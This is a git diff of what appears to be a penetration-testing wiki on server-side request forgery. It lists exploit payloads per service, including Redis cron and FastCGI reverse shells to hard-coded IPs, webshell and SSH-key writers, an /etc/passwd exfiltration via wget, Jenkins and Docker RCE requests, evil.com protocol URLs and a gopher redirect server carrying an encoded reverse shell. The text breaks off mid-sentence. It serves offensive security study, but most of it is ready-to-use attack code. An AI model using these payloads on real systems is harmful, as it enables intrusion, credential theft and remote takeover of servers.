-/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png -``` - -[OpenTSDB 2.4.0 Remote Code Execution](https://github.com/OpenTSDB/opentsdb/issues/2051) - -**SSRF Canary: curl via RCE - CVE-2020-35476** - -```bash -/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json -``` - -## Jenkins - -**Commonly bound ports: 80,443 (SSL),8080,8888** - -Great writeup [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html). - -**SSRF Canary: CVE-2018-1000600** - -```bash -/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai -``` - -**RCE** - -Follow the instructions here to achieve RCE via GET: [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html) - -```bash -/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange; -``` - -**RCE via Groovy** - -``` -cmd = 'curl burp_collab' -pay = 'public class x {public x(){"%s".execute()}}' % cmd -data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay) -``` - -## Hystrix Dashboard - -**Commonly bound ports: 80,443 (SSL),8080** - -Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6. - -**SSRF Canary: CVE-2020-5412** - -```bash -/proxy.stream?origin=http://SSRF_CANARY/ -``` - -## W3 Total Cache - -**Commonly bound ports: 80,443 (SSL)** - -W3 Total Cache 0.9.2.6-0.9.3 - -**SSRF Canary: CVE-2019-6715** - -This needs to be a PUT request: - -```bash -PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 -Host: {{Hostname}} -Accept: */* -User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 -Content-Length: 124 -Content-Type: application/x-www-form-urlencoded -Connection: close - -{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"} -``` - -**SSRF Canary** - -The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3\_total\_cache.html) - -This PHP code will generate a payload for your SSRF Canary host (replace `url` with your canary host): - -```php - -``` - -## Docker - -**Commonly bound ports: 2375, 2376 (SSL)** - -If you have a partially blind SSRF, you can use the following paths to verify the presence of Docker's API: - -```bash -/containers/json -/secrets -/services -``` - -**RCE via running an arbitrary docker image** - -```http -POST /containers/create?name=test HTTP/1.1 -Host: website.com -Content-Type: application/json -... - -{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true} -``` - -Replace alpine with an arbitrary image you would like the docker container to run. - -## Gitlab Prometheus Redis Exporter - -**Commonly bound ports: 9121** - -This vulnerability affects Gitlab instances before version 13.1.1. According to the [Gitlab documentation](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus) `Prometheus and its exporters are on by default, starting with GitLab 9.0.` - -These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter. - -The following endpoint will allow an attacker to dump all the keys in the redis server provided via the target parameter: - -```bash -http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=* -``` - -*** - -**Possible via Gopher** - -## Redis - -**Commonly bound port: 6379** - -Recommended reading: - -* [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) -* [SSRF Exploits against Redis](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis) - -**RCE via Cron** - [Gopher Attack Surfaces](https://blog.chaitin.cn/gopher-attack-surfaces/) - -```bash -redis-cli -h $1 flushall -echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1\n\n"|redis-cli -h $1 -x set 1 -redis-cli -h $1 config set dir /var/spool/cron/ -redis-cli -h $1 config set dbfilename root -redis-cli -h $1 save -``` - -Gopher: - -```bash -gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a -``` - -**RCE via Shell Upload (PHP)** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0) - -```python -#!/usr/bin/env python -# -*-coding:utf-8-*- - -import urllib -protocol="gopher://" -ip="192.168.189.208" -port="6379" -shell="\n\n\n\n" -filename="shell.php" -path="/var" -passwd="" - -cmd=["flushall", - "set 1 {}".format(shell.replace(" ","${IFS}")), - "config set dir {}".format(path), - "config set dbfilename {}".format(filename), - "save" - ] -if passwd: - cmd.insert(0,"AUTH {}".format(passwd)) -payload=protocol+ip+":"+port+"/_" -def redis_format(arr): - CRLF="\r\n" - redis_arr = arr.split(" ") - cmd="" - cmd+="*"+str(len(redis_arr)) - for x in redis_arr: - cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ") - cmd+=CRLF - return cmd - -if __name__=="__main__": - for x in cmd: - payload += urllib.quote(redis_format(x)) - print payload -``` - -**RCE via authorized\_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0) - -```python -import urllib -protocol="gopher://" -ip="192.168.189.208" -port="6379" -# shell="\n\n\n\n" -sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n" -filename="authorized_keys" -path="/root/.ssh/" -passwd="" -cmd=["flushall", - "set 1 {}".format(sshpublic_key.replace(" ","${IFS}")), - "config set dir {}".format(path), - "config set dbfilename {}".format(filename), - "save" - ] -if passwd: - cmd.insert(0,"AUTH {}".format(passwd)) -payload=protocol+ip+":"+port+"/_" -def redis_format(arr): - CRLF="\r\n" - redis_arr = arr.split(" ") - cmd="" - cmd+="*"+str(len(redis_arr)) - for x in redis_arr: - cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ") - cmd+=CRLF - return cmd - -if __name__=="__main__": - for x in cmd: - payload += urllib.quote(redis_format(x)) - print payload -``` - -**RCE on GitLab via Git protocol** - -Great writeup from Liveoverflow [here](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/). - -While this required authenticated access to GitLab to exploit, I am including the payload here as the `git` protocol may work on the target you are hacking. This payload is for reference. - -```bash -git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git -``` - -## Memcache - -**Commonly bound port: 11211** - -* [vBulletin Memcache RCE](https://www.exploit-db.com/exploits/37815) -* [GitHub Enterprise Memcache RCE](https://www.exploit-db.com/exploits/42392) -* [Example Gopher payload for Memcache](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell) - -```bash -gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a -gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a -``` - -## Apache Tomcat - -**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** - -Effective against Tomcat 6 only: - -[gopher-tomcat-deployer](https://github.com/pimps/gopher-tomcat-deployer) - -CTF writeup using this technique: - -[From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/) - -## FastCGI - -**Commonly bound ports: 80,443 (SSL)** - -This was taken from [here](https://blog.chaitin.cn/gopher-attack-surfaces/). - -```bash -gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00 -``` - -## Java RMI - -**Commonly bound ports: 1090,1098,1099,1199,4443-4446,8999-9010,9999** - -Blind _SSRF_ vulnerabilities that allow arbitrary bytes (_gopher based_) can be used to perform deserialization or codebase attacks on the _Java RMI_ default components (_RMI Registry_, _Distributed Garbage Collector_, _Activation System_). A detailed writeup can be found [here](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/). The following listing shows an example for the payload generation: - -``` -$ rmg serial 127.0.0.1 1090 CommonsCollections6 'curl example.burpcollaborator.net' --component reg --ssrf --gopher -[+] Creating ysoserial payload... done. -[+] -[+] Attempting deserialization attack on RMI Registry endpoint... -[+] -[+] SSRF Payload: gopher://127.0.0.1:1090/_%4a%52%4d%49%00%02%4c%50%ac%ed%00%05%77%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%44%15%4d[...] -``` - -*** - -**Tools** - -## Gopherus - -* [Gopherus - Github](https://github.com/tarunkant/Gopherus) -* [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/) - -This tool generates Gopher payloads for: - -* MySQL -* PostgreSQL -* FastCGI -* Redis -* Zabbix -* Memcache - -## remote-method-guesser - -* [remote-method-guesser - Github](https://github.com/qtc-de/remote-method-guesser) -* [Blog post on SSRF usage](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/) - -_remote-method-guesser_ is a _Java RMI_ vulnerability scanner that supports attack operations for most common _Java RMI_ vulnerabilities. Most of the available operations support the `--ssrf` option, to generate an _SSRF_ payload for the requested operation. Together with the `--gopher` option, ready to use _gopher_ payloads can be generated directly. - -## SSRF Proxy - -* [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy) - -SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF). - -## References - -* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4) -* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md new file mode 100644 index 000000000..5bd027155 --- /dev/null +++ b/pentesting-web/ssrf-server-side-request-forgery/README.md @@ -0,0 +1,261 @@ +# SSRF (Server Side Request Forgery) + +## What is Server Side Request Forgery? + +Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to **induce the server-side application to make HTTP requests to an arbitrary domain** of the attacker's choosing. (From [here](https://portswigger.net/web-security/ssrf)) + +## Capture SSRF + +The first thing you need to do is to capture a SSRF interaction provoked by you. To capture a HTTP or DNS interaction you can use tools such as: + +* **Burpcollab** +* [**pingb**](http://pingb.in) +* ****[**canarytokens**](https://canarytokens.org/generate#)**** +* ****[**interractsh**](https://github.com/projectdiscovery/interactsh)**** +* ****[**http://webhook.site**](http://webhook.site)**** +* [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff)**** + +## Whitelisted Domains Bypass + +Usually you will find that the SSRF is only working in **certain whitelisted domains** or URL. In the following page you have a **compilation of techniques to try to bypass that whitelist**: + +{% content-ref url="url-format-bypass.md" %} +[url-format-bypass.md](url-format-bypass.md) +{% endcontent-ref %} + +### Bypass via open redirect + +If the server is correctly protected you could **bypass all the restrictions by exploiting an Open Redirect inside the web page**. Because the webpage will allow **SSRF to the same domain** and probably will **follow redirects**, you can exploit the **Open Redirect to make the server to access internal any resource**.\ +Read more here: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf) + +## SSRF via Referrer header + +Some applications employ server-side analytics software that tracks visitors. This software often logs the Referrer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referrer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities.\ +To discover this kind of "hidden" vulnerabilities you could use the plugin "**Collaborator Everywhere**" from Burp. + +## Exploitation + +### [Wget file upload](../file-upload/#wget-file-upload-ssrf-trick) + +### file:// + +``` +file:///etc/passwd +``` + +### dict:// + +The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: + +``` +dict://;@:/d::: +ssrf.php?url=dict://attacker:11111/ +``` + +### SFTP:// + +A network protocol used for secure file transfer over secure shell + +``` +ssrf.php?url=sftp://evil.com:11111/ +``` + +### TFTP:// + +Trivial File Transfer Protocol, works over UDP + +``` +ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET +``` + +### LDAP:// + +Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service. + +``` +ssrf.php?url=ldap://localhost:11211/%0astats%0aquit +``` + +### Gopher:// + +Using this protocol you can specify the **IP, port and bytes** you want the server to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\ +Fortunately, you can use [Gopherus](https://github.com/tarunkant/Gopherus) to create payloads for several services. Additionally, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) can be used to create _gopher_ payloads for _Java RMI_ services. + +#### Gopher smtp + +``` +ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a +will make a request like +HELO localhost +MAIL FROM: +RCPT TO: +DATA +From: [Hacker] +To: +Date: Tue, 15 Sep 2017 17:20:26 -0400 +Subject: Ah Ah AHYou didn't say the magic word ! +. +QUIT +``` + +#### Gopher HTTP + +```bash +#For new lines you can use %0A, %0D%0A +gopher://:8080/_GET / HTTP/1.0%0A%0A +gopher://:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body +``` + +#### Gopher SMTP — Back connect to 1337 + +{% code title="redirect.php" %} +```php +Now query it. +https://example.com/?q=http://evil.com/redirect.php. +``` +{% endcode %} + +### SMTP + +From [https://twitter.com/har1sec/status/1182255952055164929](https://twitter.com/har1sec/status/1182255952055164929):\ +1\. connect with SSRF on smtp localhost:25\ +2\. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail\ +3\. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains\ +4\. connect + +### SSRF with Command Injection + +It might be worth trying a payload like: `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` `` + +### Exploiting PDFs Rendering + +If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator** itself (the server) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.** + +### From SSRF to DoS + +Create several sessions and try to download heavy files exploiting the SSRF from the sessions. + +### SSRF Redirect to Gopher + +For some exploitations you might need to **send a redirect response** (potentially to use a different protocol like gopher). Here you have different python codes to respond with a redirect: + +```python +# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes +from http.server import HTTPServer, BaseHTTPRequestHandler +import ssl + +class MainHandler(BaseHTTPRequestHandler): + def do_GET(self): + print("GET") + self.send_response(301) + self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a") + self.end_headers() + +httpd = HTTPServer(('0.0.0.0', 443), MainHandler) +httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True) +httpd.serve_forever() +``` + +```python +from flask import Flask, redirect +from urllib.parse import quote +app = Flask(__name__) + +@app.route('/') +def root(): + return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301) + +if __name__ == "__main__": + app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) +``` + +### Abusing DNS Rebidding + TLS Session ID/Session ticket + +Requirements: + +* **SSRF** +* **Outbound TLS sessions** +* **Stuff on local ports** + +Attack: + +1. Ask the user/bot **access** a **domain** controlled by the **attacker** +2. The **TTL** of the **DNS** is **0** sec (so the victim will check the IP of the domain again soon) +3. A **TLS connection** is created between the victim and the domain of the attacker. The attacker introduces the **payload inside** the **Session ID or Session Ticket**. +4. The **domain** will start an **infinite loop** of redirects against **himself**. The goal of this is to make the user/bot access the domain until it perform **again** a **DNS request** of the domain. +5. In the DNS request a **private IP** address is given **now** (127.0.0.1 for example) +6. The user/bot will try to **reestablish the TLS connection** and in order to do so it will **send** the **Session** ID/Ticket ID (where the **payload** of the attacker was contained). So congratulations you managed to ask the **user/bot attack himself**. + +Note that during this attack, if you want to attack localhost:11211 